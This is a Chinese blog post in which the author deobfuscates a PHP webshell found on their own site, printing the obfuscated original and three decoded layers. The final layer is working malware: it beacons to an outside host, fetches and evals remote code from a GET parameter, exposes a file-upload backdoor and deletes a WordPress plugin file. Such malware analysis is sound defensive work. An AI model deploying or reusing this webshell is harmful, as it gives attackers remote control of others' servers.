混淆のwebshell解密练习

昨天发现了网站被传了三个webshell，尝试解一下其中一个：

orginal:

<?php
// Silence is golden.
function _qErd($_vD2WjKueM) {
	$_vD2WjKueM=substr($_vD2WjKueM,(int)(hex2bin('31313134')));
	$_vD2WjKueM=substr($_vD2WjKueM,(int)(hex2bin('30')),(int)(hex2bin('2d323637')));
	return $_vD2WjKueM;
}
$_xpIeKX='_qErd';
$_cZe4KI='base64_decode';
function _rS1RLLFrNRXRD7H($_N3aEWxN) {
	global $_xpIeKX;
	global $_cZe4KI;
	return strrev(gzinflate($_cZe4KI(_qErd($_N3aEWxN))));
}
eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_rS1RLLFrNRXRD7H('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'))))))))))))))))))))))))));

这里结构比较简单，最内层函数是_rS1RLLFrNRXRD7H执行的是strrev(gzinflate($_cZe4KI(_qErd($_N3aEWxN))))
先echo一下结果

第一层

error_reporting(0);
function Class_UC_key($string) {
	$array = strlen (trim($string));
	$debuger = '';
	for ($one = 0;$one < $array;$one+=2) {
		$debuger .= pack ("C",hexdec (substr ($string,$one,2)));
	}
	return $debuger;
}
header("content-Type: text/html; charset=gb2312");
$filename=Class_UC_key("6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827").'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\')));';
$PHP=Create_Function('',$filename);
$PHP();

echo一下filename，前面的函数都是对filename变量的处理

第二层

eval(gzuncompress(base64_decode('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')));

一段eval 这里把结果输出一下
echo eval里面的东西

第三层

goto e3crB;
Mr5fB: unlink($K9UO0);
goto Xn1IR;
LvL1s: $TVOZ5 = str_replace("\74\77\x70\x68\160", '', $TVOZ5);
goto jfwFS;
Xn1IR: t07kv: goto sc74I;
TD2Tb: eG7VJ: goto Q_Qw0;
sc74I: function dxeSp() {
	goto htNpF;
	htNpF: $qLwRy = curl_init();
	goto wrFdd;
	UOGdU: $GfQMB = curl_exec($qLwRy);
	goto yAkNb;
	yAkNb: curl_close($qLwRy);
	goto Fqhim;
	wrFdd: curl_setopt($qLwRy, CURLOPT_URL, "\150\164\164\160\x3a\x2f\57\x70\x6f\x72\156\x68\x75\142\146\157\170\x2e\143\x6f\x6d\57\163\x74\171\x6c\x65\x2e\152\163");
	goto s4xmL;
	Fqhim: return '';
	goto vzrTu;
	s4xmL: curl_setopt($qLwRy, CURLOPT_REFERER, $_SERVER["\x48\x54\x54\x50\x5f\x48\117\123\x54"] . $_SERVER["\x52\x45\121\x55\x45\x53\124\x5f\x55\122\x49"]);
	goto UOGdU;
	vzrTu:
}
goto C_RzN;
uveSM: $y7vC8 = $_GET["\x70\x68\160\x78"];
goto qx5NA;
gZZm5: $z4PZW = "\x2e\x2e\57\160\150\x70\57\x63\157\156\x6e\x65\143\164\x6f\162\x2e\x6d\151\156\151\x6d\x61\x6c\x2e\160\x68\160";
goto qnFue;
qx5NA: if (empty($y7vC8) or !stristr($y7vC8, "\150\164\x74\x70")) {
	goto MDG5L;
}
goto cb2cE;
V7h28: MDG5L: goto pcc4J;
rmpak: eval($TVOZ5);
goto Otbc3;
cb2cE: $TVOZ5 = file_get_contents($y7vC8);
goto FqUyM;
pcc4J: exit;
goto B5NYB;
wzun0: $uuIqw = $_GET["\x78"];
goto Fnamy;
DI15w: unlink($z4PZW);
goto TD2Tb;
B5NYB: yYIZl: goto h6Vma;
YhZ0n: $TVOZ5 = str_replace("\74\77\x70\x68\160", '', $TVOZ5);
goto LvL1s;
k__tE: $uL6Hv = $_FILES["\x66\x69\x6c\x65"]["\156\141\155\145"];
goto pq0kM;
C_RzN: dxeSP();
goto wzun0;
jfwFS: $TVOZ5 = str_replace("\x3f\x3e", '', $TVOZ5);
goto rmpak;
v6Qg0: if (!file_exists($z4PZW)) {
	goto eG7VJ;
}
goto DI15w;
Fnamy: if (!($uuIqw == "\157\x6f\x6f")) {
	goto WSlRA;
}
goto mcYa9;
qnFue: $K9UO0 = $_SERVER["\x44\x4f\x43\125\x4d\105\x4e\124\x5f\122\x4f\x4f\124"] . "\x2f\x77\x70\55\143\157\x6e\164\145\x6e\x74\x2f\160\x6c\165\147\x69\x6e\163\x2f\x77\160\x2d\x66\x69\154\145\55\155\x61\x6e\x61\x67\x65\x72\x2f\154\x69\142\x2f\x70\x68\x70\57\143\x6f\156\x6e\x65\143\164\157\x72\56\x6d\x69\156\x69\x6d\141\x6c\56\x70\150\160";
goto v6Qg0;
Otbc3: goto yYIZl;
goto V7h28;
Z3MBF: $TVOZ5 = gzHZ_($y7vC8);
goto uhJXg;
pq0kM: echo "\x3c\146\157\162\155\x20\x6d\x65\164\150\x6f\144\x3d\47\x50\x4f\x53\124\x27\40\x65\156\143\x74\171\x70\145\75\x27\x6d\x75\154\164\151\160\141\x72\x74\57\x66\157\162\155\55\x64\141\x74\x61\x27\x3e\74\151\x6e\x70\165\164\x20\x74\171\x70\x65\x3d\47\x66\x69\x6c\x65\x27\156\x61\x6d\145\x3d\x27\x66\151\x6c\145\47\40\x2f\76\74\x69\x6e\160\x75\164\x20\164\171\160\145\x3d\x27\x73\165\142\155\151\164\x27\x20\166\141\154\x75\x65\x3d\47\x75\x70\x27\40\57\76\x3c\x2f\x66\157\162\x6d\76";
goto E0PZT;
uhJXg: XD6UJ: goto YhZ0n;
O_xCW: WSlRA: goto uveSM;
FqUyM: if (!empty($TVOZ5)) {
	goto XD6UJ;
}
goto Z3MBF;
e3crB: error_reporting(0);
goto gZZm5;
mcYa9: $kORdg = $_FILES["\x66\151\154\x65"]["\x74\x6d\x70\x5f\x6e\x61\x6d\x65"];
goto k__tE;
E0PZT: move_uploaded_file($kORdg, $uL6Hv);
goto O_xCW;
Q_Qw0: if (!file_exists($K9UO0)) {
	goto t07kv;
}
goto Mr5fB;
h6Vma: function GZHZ_($aVTmy) {
	goto FuE12;
	dquDd: curl_setopt($ynMtS, CURLOPT_USERAGENT, "\115\157\172\x69\x6c\154\x61\57\65\x2e\60\x20\x28\127\151\x6e\x64\x6f\x77\x73\x20\116\x54\40\x31\x30\x2e\x30\73\x20\x57\x4f\x57\66\64\73\40\x72\x76\x3a\x34\63\x2e\60\x29\x20\107\x65\143\x6b\x6f\57\x32\x30\x31\60\x30\x31\60\x31\x20\106\x69\x72\x65\146\x6f\170\x2f\64\63\x2e\x30");
	goto bTsDs;
	lFAc9: curl_setopt($ynMtS, CURLOPT_HEADER, false);
	goto DgOca;
	Eml33: curl_setopt($ynMtS, CURLOPT_SSL_VERIFYPEER, 0);
	goto GvrcB;
	ljL_m: wXwyX: goto lFAc9;
	bTsDs: curl_setopt($ynMtS, CURLOPT_FOLLOWLOCATION, TRUE);
	goto GhhUY;
	FuE12: $ynMtS = curl_init();
	goto SrY8E;
	DgOca: return curl_exec($ynMtS);
	goto p29D7;
	SrY8E: curl_setopt($ynMtS, CURLOPT_TIMEOUT, 40);
	goto FmwAj;
	GvrcB: curl_setopt($ynMtS, CURLOPT_SSL_VERIFYHOST, 0);
	goto ljL_m;
	FmwAj: curl_setopt($ynMtS, CURLOPT_RETURNTRANSFER, TRUE);
	goto OEWdL;
	OEWdL: curl_setopt($ynMtS, CURLOPT_URL, $aVTmy);
	goto dquDd;
	GhhUY: if (!stristr($aVTmy, "\x68\x74\x74\160\x73\x3a\57\57")) {
		goto wXwyX;
	}
	goto Eml33;
	p29D7:
}

查了一下推测是yakpro-po
https://github.com/demonxian3/crack-yakpro-php

尝试接一下只是把字符编码解码了并没有解决一堆goto的问题
参考链接https://myslide.cn/slides/9137?vertical=1

posted @ 2020-09-11 16:10 歇马阅读(1076) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

歇马

混淆のwebshell解密练习

orginal:

第一层

第二层

第三层

公告